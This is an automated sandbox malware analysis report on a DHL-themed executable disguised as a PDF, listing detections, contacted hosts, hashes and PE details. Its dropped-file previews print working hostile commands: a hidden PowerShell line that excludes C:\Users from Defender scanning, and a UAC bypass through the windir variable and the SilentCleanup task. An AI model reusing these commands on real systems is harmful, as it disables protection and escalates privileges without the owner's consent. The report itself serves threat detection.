18.0.Iqzenco.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
18.1.Iqzenco.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
22.2.mobsync.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1141389
0.1.ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
5.2.mobsync.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1141389
26.2.secinit.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1141389
16.0.Iqzenco.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
16.1.Iqzenco.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen

              Domains

              No Antivirus matches

              URLs

Source | Detection | Scanner | Label
ongod4ever.ddns.net | 0% | Avira URL Cloud | safe

              Domains and IPs

              Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
ongod4ever.ddns.net | 185.140.53.15 | true | false | - | high
onedrive.live.com | unknown | unknown | false | - | high
bl30uw.sn.files.1drv.com | unknown | unknown | false | - | high

                    Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
ongod4ever.ddns.net | true | Avira URL Cloud: safe | unknown

                    URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
https://bl30uw.sn.files.1drv.com/y4maOmpRLgEZgKpnLv-hczrMb96VqtMQDZd-m0g51QRpK-v8c65WYNUi2NOLDdGNQiU | Iqzenco.exe, 00000010.00000003.752060770.00000000007A3000.00000004.00000001.sdmp | false | - | high
https://bl30uw.sn.files.1drv.com/y4msI7_EyjC8cs97rdyt7ReCTl2WoedGiqx9hVOiugfpodFj4cXgoX5lAQfrGe41zrt | Iqzenco.exe, 00000010.00000003.750846747.00000000007A3000.00000004.00000001.sdmp | false | - | high
https://onedrive.live.com/download?cid=97429F42E815B766&resid=97429F42E815B766%21166&authkey=AFRFbbm | Iqzenco.exe, 00000010.00000003.752060770.00000000007A3000.00000004.00000001.sdmp | false | - | high
https://bl30uw.sn.files.1drv.com/y4mGst0byrg6Ub0CK8iKHaximJI4M7D1uUmqxfl02ZpIfKXbkyeYXQLL6P2J6UxS4Yz | Iqzenco.exe, 00000010.00000003.750864485.00000000007B1000.00000004.00000001.sdmp | false | - | high

                            Contacted IPs


                            Public

IP | Domain | Country | ASN | ASN Name | Malicious
185.140.53.15 | ongod4ever.ddns.net | Sweden | 209623 | DAVID_CRAIGGG | false

                            Private

IP
192.168.2.1

                            General Information

                            Joe Sandbox Version:33.0.0 White Diamond
                            Analysis ID:491719
                            Start date:27.09.2021
                            Start time:20:38:59
                            Joe Sandbox Product:CloudBasic
                            Overall analysis duration:0h 13m 28s
                            Hypervisor based Inspection enabled:false
                            Report type:light
                            Sample file name:ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                            Number of analysed new started processes analysed:28
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • HDC enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Detection:MAL
                            Classification:mal100.troj.spyw.evad.winEXE@23/10@49/2
                            EGA Information:Failed
                            HDC Information:
                            • Successful, ratio: 44.2% (good quality ratio 42.2%)
                            • Quality average: 83.9%
                            • Quality standard deviation: 25.5%
                            HCA Information:
                            • Successful, ratio: 97%
                            • Number of executed functions: 0
                            • Number of non-executed functions: 0
                            Cookbook Comments:
                            • Adjust boot time
                            • Enable AMSI
                            • Found application associated with file extension: .exe
                            Warnings:
                            • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                            • TCP Packets have been reduced to 100
                            • Excluded IPs from analysis (whitelisted): 20.82.210.154, 2.20.86.117, 13.107.43.13, 13.107.42.12, 20.82.209.183, 209.197.3.8, 13.107.42.13, 20.54.110.249, 40.112.88.60, 23.10.249.43, 23.10.249.26, 20.50.102.62
                            • Excluded domains from analysis (whitelisted): odc-web-brs.onedrive.akadns.net, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a1449.dscg2.akamai.net, arc.msn.com, l-0004.dc-msedge.net, l-0004.l-msedge.net, e12564.dspb.akamaiedge.net, odwebpl.trafficmanager.net.l-0004.dc-msedge.net.l-0004.l-msedge.net, l-0003.l-msedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, sn-files.ha.1drv.com.l-0003.dc-msedge.net.l-0003.l-msedge.net, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, odc-web-geo.onedrive.akadns.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, odc-sn-files-geo.onedrive.akadns.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, ris.api.iris.microsoft.com, odc-sn-files-brs.onedrive.akadns.net, store-images.s-microsoft.com, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                            • Not all processes were analyzed, report is missing behavior information
                            • Report creation exceeded maximum time and may have missing disassembly code information.
                            • Report size exceeded maximum capacity and may have missing behavior information.
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.

                            Simulations

                            Behavior and APIs

                            Time | Type | Description
                            20:39:58 | API Interceptor | 2x Sleep call for process: ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe modified
                            20:40:22 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Iqzenco C:\Users\Public\Libraries\ocnezqI.url
                            20:40:30 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Iqzenco C:\Users\Public\Libraries\ocnezqI.url
                            20:40:34 | API Interceptor | 2x Sleep call for process: Iqzenco.exe modified

                            Joe Sandbox View / Context

                            IPs

                            No context

                            Domains

                            No context

                            ASN

                            No context

                            JA3 Fingerprints

                            No context

                            Dropped Files

                            No context

                            Created / dropped Files

                            C:\Users\Public\KDECO.bat
                            Process:C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):155
                            Entropy (8bit):4.687076340713226
                            Encrypted:false
                            SSDEEP:3:LjT5LJJFIf9oM3KN6QNb3DM9bWQqA5SkrF2VCceGAFddGeWLCXlRA3+OR:rz81R3KnMMQ75ieGgdEYlRA/R
                            MD5:213C60ADF1C9EF88DC3C9B2D579959D2
                            SHA1:E4D2AD7B22B1A8B5B1F7A702B303C7364B0EE021
                            SHA-256:37C59C8398279916CFCE45F8C5E3431058248F5E3BEF4D9F5C0F44A7D564F82E
                            SHA-512:FE897D9CAA306B0E761B2FD61BB5DC32A53BFAAD1CE767C6860AF4E3AD59C8F3257228A6E1072DAB0F990CB51C59C648084BA419AC6BC5C0A99BDFFA569217B7
                            Malicious:false
                            Reputation:unknown
                            Preview: start /min powershell -WindowStyle Hidden -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'" & exit
                            C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe
                            Process:C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe
                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):1009152
                            Entropy (8bit):6.9988393829759294
                            Encrypted:false
                            SSDEEP:24576:L5A8SqIkJpbDpQc6ScVHdPaHxA7VhLRYF:Lr5ZoHdPaRyzKF
                            MD5:3808D4A11CBEE20896CCA28F9A3BCB9B
                            SHA1:B3A533D6E00ACE2EC0612C9AF66C6DD69C5180B3
                            SHA-256:53C2E53D33F80E88B16CCE06621F99680E0E5F387315CB81AF97CEE58080165A
                            SHA-512:980425EFD3D01A3C5ADBBD3873D819AF60C1E62A9B32149B01F1C1E6DE338D068B53C18AD4645C66E8C13DB8F21440F2E0C01B27E3B1E4AF55D19474EC83A5FD
                            Malicious:true
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 24%
                            Reputation:unknown
                            Preview: MZ......................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^.*.................j...........z............@..............................................@...............................(......./...................@..0r...........0...............0..........................X....................................].......^.................. ..`........P....p.......b.............. ..`.........&.......(...n..............@............8.......................................(.......*..................@...........4.... ..................................0....0......................@..@........0r...@...t..................@..B........./.......0...6..............@..@.............0......................@..@................................................................................................
                            C:\Users\Public\Libraries\ocnezqI.url
                            Process:C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe
                            File Type:MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Iqzenco\\Iqzenco.exe">), ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):96
                            Entropy (8bit):4.740775825389126
                            Encrypted:false
                            SSDEEP:3:HRAbABGQYmTWAX+rSF55i0XMfiyGAywSsGKd6ov:HRYFVmTWDyzFlsbDv
                            MD5:5E9FED8C24BB01153751DF696536E82A
                            SHA1:D23E4B05254E62153D6F0158F4F869AB00C5DF15
                            SHA-256:08BC6F401999D30F1EB81AD3C9CB0EB01063CF858C9818F238ED233833947AE8
                            SHA-512:4920341592295B38653FD6DD227F99625A1E62C3E1E9CE014F506C724319528A6E45829C21B62A5674FF47BB3BD1B62FD2DB9A24583208DC7659E4B88A8BB7FD
                            Malicious:false
                            Yara Hits:
                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: C:\Users\Public\Libraries\ocnezqI.url, Author: @itsreallynick (Nick Carr)
                            Reputation:unknown
                            Preview: [InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Iqzenco\\Iqzenco.exe"..IconIndex=2..
                            C:\Users\Public\Trast.bat
                            Process:C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):34
                            Entropy (8bit):4.314972767530033
                            Encrypted:false
                            SSDEEP:3:LjTnaHF5wlM:rnaHSM
                            MD5:4068C9F69FCD8A171C67F81D4A952A54
                            SHA1:4D2536A8C28CDCC17465E20D6693FB9E8E713B36
                            SHA-256:24222300C78180B50ED1F8361BA63CB27316EC994C1C9079708A51B4A1A9D810
                            SHA-512:A64F9319ACC51FFFD0491C74DCD9C9084C2783B82F95727E4BFE387A8528C6DCF68F11418E88F1E133D115DAF907549C86DD7AD866B2A7938ADD5225FBB2811D
                            Malicious:false
                            Reputation:unknown
                            Preview: start /min C:\Users\Public\UKO.bat
                            C:\Users\Public\UKO.bat
                            Process:C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):250
                            Entropy (8bit):4.865356627324657
                            Encrypted:false
                            SSDEEP:6:rgnMXd1CQnMXd1COm8hnaHNHIXUnMXd1CoD9c1uOw1H1gOvOBAn:rgamIHIXUaXe1uOeVqy
                            MD5:EAF8D967454C3BBDDBF2E05A421411F8
                            SHA1:6170880409B24DE75C2DC3D56A506FBFF7F6622C
                            SHA-256:F35F2658455A2E40F151549A7D6465A836C33FA9109E67623916F889849EAC56
                            SHA-512:FE5BE5C673E99F70C93019D01ABB0A29DD2ECF25B2D895190FF551F020C28E7D8F99F65007F440F0F76C5BCAC343B2A179A94D190C938EA3B9E1197890A412E9
                            Malicious:false
                            Reputation:unknown
                            Preview: reg delete hkcu\Environment /v windir /f..reg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\KDECO.bat reg delete hkcu\Environment /v windir /f && REM "..schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I & exit..
                            C:\Users\Public\nest
                            Process:C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):9
                            Entropy (8bit):3.169925001442312
                            Encrypted:false
                            SSDEEP:3:1xn:Hn
                            MD5:4D2B6925406544EEF7111380E2243791
                            SHA1:A32A8FA6F2E46D8E86FA92BEA3B8D45EB168BD04
                            SHA-256:09A841DC20255A929B3CCFA47B08B8E47ADD965FF3070E8DAB1DBD050D73E97F
                            SHA-512:EFDD6C90C7EAA5D05FDD079A61B969837B350CB20AECC7CF24533636956A939B8A289B2C3BB4A7AC21BBACF818E394A13D8661427EACFC0F21C46D5855DFFEDF
                            Malicious:false
                            Reputation:unknown
                            Preview: Iqzenco..
                            C:\Users\Public\nest.bat
                            Process:C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):53
                            Entropy (8bit):4.263285494083192
                            Encrypted:false
                            SSDEEP:3:LjT9fnMXdemzCK0vn:rZnMXd1CV
                            MD5:8ADA51400B7915DE2124BAAF75E3414C
                            SHA1:1A7B9DB12184AB7FD7FCE1C383F9670A00ADB081
                            SHA-256:45AA3957C29865260A78F03EEF18AE9AEBDBF7BEA751ECC88BE4A799F2BB46C7
                            SHA-512:9AFC138157A4565294CA49942579CDB6F5D8084E56F9354738DE62B585F4C0FA3E7F2CBC9541827F2084E3FF36C46EED29B46F5DD2444062FFCD05C599992E68
                            Malicious:false
                            Reputation:unknown
                            Preview: start /min reg delete hkcu\Environment /v windir /f..
                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\Iqzencolmjnhoxprppdkgkfyidrxfas[1]
                            Process:C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):873984
                            Entropy (8bit):7.9969159829391385
                            Encrypted:true
                            SSDEEP:24576:WkRi6BScPafSfJKPyZ/Sba3koow5ba33m6YwEcds:WobBLafgJKPyZ/MpoaW6YP
                            MD5:6CFF8FAF4A45291638E775B0EB1DF24D
                            SHA1:472E6F7B86A62F191AD8A231CE58F356A046A2F7
                            SHA-256:195306105A3F635EA75E8D8E02987BB106B62C75AA1A6F4914A287E8DB424631
                            SHA-512:F23B002AC8D7060D065B7DAFA6AD39C07ED5AD5CE20394B88CCB65B7EBD74EA31EBC4710F853FF6DAA2926CC747AF797FBE3E8E01A79DDDD169E7AB9E9978308
                            Malicious:false
                            Reputation:unknown
                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\Iqzencolmjnhoxprppdkgkfyidrxfas[1]
                            Process:C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):873984
                            Entropy (8bit):7.9969159829391385
                            Encrypted:true
                            SSDEEP:24576:WkRi6BScPafSfJKPyZ/Sba3koow5ba33m6YwEcds:WobBLafgJKPyZ/MpoaW6YP
                            MD5:6CFF8FAF4A45291638E775B0EB1DF24D
                            SHA1:472E6F7B86A62F191AD8A231CE58F356A046A2F7
                            SHA-256:195306105A3F635EA75E8D8E02987BB106B62C75AA1A6F4914A287E8DB424631
                            SHA-512:F23B002AC8D7060D065B7DAFA6AD39C07ED5AD5CE20394B88CCB65B7EBD74EA31EBC4710F853FF6DAA2926CC747AF797FBE3E8E01A79DDDD169E7AB9E9978308
                            Malicious:false
                            Reputation:unknown
                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\Iqzencolmjnhoxprppdkgkfyidrxfas[1]
                            Process:C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):873984
                            Entropy (8bit):7.9969159829391385
                            Encrypted:true
                            SSDEEP:24576:WkRi6BScPafSfJKPyZ/Sba3koow5ba33m6YwEcds:WobBLafgJKPyZ/MpoaW6YP
                            MD5:6CFF8FAF4A45291638E775B0EB1DF24D
                            SHA1:472E6F7B86A62F191AD8A231CE58F356A046A2F7
                            SHA-256:195306105A3F635EA75E8D8E02987BB106B62C75AA1A6F4914A287E8DB424631
                            SHA-512:F23B002AC8D7060D065B7DAFA6AD39C07ED5AD5CE20394B88CCB65B7EBD74EA31EBC4710F853FF6DAA2926CC747AF797FBE3E8E01A79DDDD169E7AB9E9978308
                            Malicious:false
                            Reputation:unknown

                            Static File Info

                            General

                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Entropy (8bit):6.9988393829759294
                            TrID:
                            • Win32 Executable (generic) a (10002005/4) 99.94%
                            • Win16/32 Executable Delphi generic (2074/23) 0.02%
                            • Generic Win/DOS Executable (2004/3) 0.02%
                            • DOS Executable Generic (2002/1) 0.02%
                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                            File name:ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe
                            File size:1009152
                            MD5:3808d4a11cbee20896cca28f9a3bcb9b
                            SHA1:b3a533d6e00ace2ec0612c9af66c6dd69c5180b3
                            SHA256:53c2e53d33f80e88b16cce06621f99680e0e5f387315cb81af97cee58080165a
                            SHA512:980425efd3d01a3c5adbbd3873d819af60c1e62a9b32149b01f1c1e6de338d068b53c18ad4645c66e8c13db8f21440f2e0c01b27e3b1e4af55d19474ec83a5fd
                            SSDEEP:24576:L5A8SqIkJpbDpQc6ScVHdPaHxA7VhLRYF:Lr5ZoHdPaRyzKF
                            File Content Preview:MZ......................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                            File Icon

                            Icon Hash:d2e6c45663c86871

                            Static PE Info

                            General

                            Entrypoint:0x477a08
                            Entrypoint Section:......
                            Digitally signed:false
                            Imagebase:0x400000
                            Subsystem:windows gui
                            Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
                            DLL Characteristics:
                            Time Stamp:0x2A2E5E19 [Thu Jun 4 18:16:57 1992 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:4
                            OS Version Minor:0
                            File Version Major:4
                            File Version Minor:0
                            Subsystem Version Major:4
                            Subsystem Version Minor:0
                            Import Hash:7485e319df85e87afca01bdc77d12961

                            Entrypoint Preview

                            Instruction
                            push ebp
                            mov ebp, esp
                            add esp, FFFFFFF0h
                            mov eax, 00476B38h
                            call 00007F8F78AFEEADh
                            mov eax, dword ptr [0047A460h]
                            mov eax, dword ptr [eax]
                            call 00007F8F78B53339h
                            mov ecx, dword ptr [0047A270h]
                            mov eax, dword ptr [0047A460h]
                            mov eax, dword ptr [eax]
                            mov edx, dword ptr [0047656Ch]
                            call 00007F8F78B53339h
                            mov eax, dword ptr [0047A460h]
                            mov eax, dword ptr [eax]
                            call 00007F8F78B533ADh
                            call 00007F8F78AFCD1Ch
                            lea eax, dword ptr [eax+00h]
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al

                            Data Directories

                            Name | Virtual Address | Virtual Size | Is in Section
                            IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_IMPORT | 0x7f000 | 0x28e6 | ......
                            IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x8c000 | 0x72fc2 | .....
                            IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x84000 | 0x7230 | ......
                            IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x83018 | 0x18 | ......
                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_TLS | 0x83000 | 0x18 | ......
                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_IAT | 0x7f7ac | 0x658 | ......
                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                            Sections

                            Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                            ..... | 0x1000 | 0x75dc0 | 0x75e00 | False | 0.529974151644 | data | 6.5690645697 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                            ...... | 0x77000 | 0xa50 | 0xc00 | False | 0.535807291667 | data | 5.68654279388 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                            ..... | 0x78000 | 0x2604 | 0x2800 | False | 0.41875 | data | 4.27539272227 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                            .... | 0x7b000 | 0x38d8 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                            ...... | 0x7f000 | 0x28e6 | 0x2a00 | False | 0.317057291667 | data | 5.12299679952 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                            .... | 0x82000 | 0x34 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                            ...... | 0x83000 | 0x30 | 0x200 | False | 0.1015625 | data | 0.606751191078 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            ...... | 0x84000 | 0x7230 | 0x7400 | False | 0.623013200431 | data | 6.65937740819 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                            ..... | 0x8c000 | 0x72fc2 | 0x73000 | False | 0.558258322011 | data | 6.93563526848 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                            Resources

                            Name | RVA | Size | Type | Language | Country
                            TMAP | 0x8caf4 | 0x197eb | ASCII text, with very long lines, with CRLF line terminators | English | United States
                            RT_CURSOR | 0xa62e0 | 0x134 | data | English | United States
                            RT_CURSOR | 0xa6414 | 0x134 | data | English | United States
                            RT_CURSOR | 0xa6548 | 0x134 | data | English | United States
                            RT_CURSOR | 0xa667c | 0x134 | data | English | United States
                            RT_CURSOR | 0xa67b0 | 0x134 | data | English | United States
                            RT_CURSOR | 0xa68e4 | 0x134 | data | English | United States
                            RT_CURSOR | 0xa6a18 | 0x134 | data | English | United States
                            RT_BITMAP | 0xa6b4c | 0x1d0 | data | English | United States
                            RT_BITMAP | 0xa6d1c | 0x1e4 | data | English | United States
                            RT_BITMAP | 0xa6f00 | 0x1d0 | data | English | United States
                            RT_BITMAP | 0xa70d0 | 0x1d0 | data | English | United States
                            RT_BITMAP | 0xa72a0 | 0x1d0 | data | English | United States
                            RT_BITMAP | 0xa7470 | 0x1d0 | data | English | United States
                            RT_BITMAP | 0xa7640 | 0x1d0 | data | English | United States
                            RT_BITMAP | 0xa7810 | 0x1d0 | data | English | United States
                            RT_BITMAP | 0xa79e0 | 0x1d0 | data | English | United States
                            RT_BITMAP | 0xa7bb0 | 0x1d0 | data | English | United States
                            RT_BITMAP | 0xa7d80 | 0x506e0 | data | English | United States
                            RT_BITMAP | 0xf8460 | 0xe8 | GLS_BINARY_LSB_FIRST | English | United States
                            RT_ICON | 0xf8548 | 0x468 | GLS_BINARY_LSB_FIRST | English | United States
                            RT_ICON | 0xf89b0 | 0x988 | data | English | United States
                            RT_ICON | 0xf9338 | 0x10a8 | data | English | United States
                            RT_ICON | 0xfa3e0 | 0x25a8 | data | English | United States
                            RT_DIALOG | 0xfc988 | 0x52 | data | |
                            RT_DIALOG | 0xfc9dc | 0x52 | data | |
                            RT_STRING | 0xfca30 | 0x148 | data | |
                            RT_STRING | 0xfcb78 | 0x390 | data | |
                            RT_STRING | 0xfcf08 | 0x1a4 | data | |
                            RT_STRING | 0xfd0ac | 0xc8 | data | |
                            RT_STRING | 0xfd174 | 0x118 | data | |
                            RT_STRING | 0xfd28c | 0x39c | data | |
                            RT_STRING | 0xfd628 | 0x390 | data | |
                            RT_STRING | 0xfd9b8 | 0x370 | data | |
                            RT_STRING | 0xfdd28 | 0x3cc | data | |
                            RT_STRING | 0xfe0f4 | 0x214 | data | |
                            RT_STRING | 0xfe308 | 0xcc | data | |
                            RT_STRING | 0xfe3d4 | 0x194 | data | |
                            RT_STRING | 0xfe568 | 0x3c4 | data | |
                            RT_STRING | 0xfe92c | 0x338 | data | |
                            RT_STRING | 0xfec64 | 0x294 | data | |
                            RT_GROUP_CURSOR | 0xfeef8 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States
                            RT_GROUP_CURSOR | 0xfef0c | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States
                            RT_GROUP_CURSOR | 0xfef20 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States
                            RT_GROUP_CURSOR | 0xfef34 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States
                            RT_GROUP_CURSOR | 0xfef48 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States
                            RT_GROUP_CURSOR | 0xfef5c | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States
                            RT_GROUP_CURSOR | 0xfef70 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States
                            RT_GROUP_ICON | 0xfef84 | 0x3e | data | English | United States

                            Imports

                            DLL | Import
                            oleaut32.dll | SysFreeString, SysReAllocStringLen, SysAllocStringLen
                            advapi32.dll | RegQueryValueExA, RegOpenKeyExA, RegCloseKey
                            user32.dll | GetKeyboardType, DestroyWindow, LoadStringA, MessageBoxA, CharNextA
                            kernel32.dll | GetACP, Sleep, VirtualFree, VirtualAlloc, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, CompareStringA, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle
                            kernel32.dll | TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
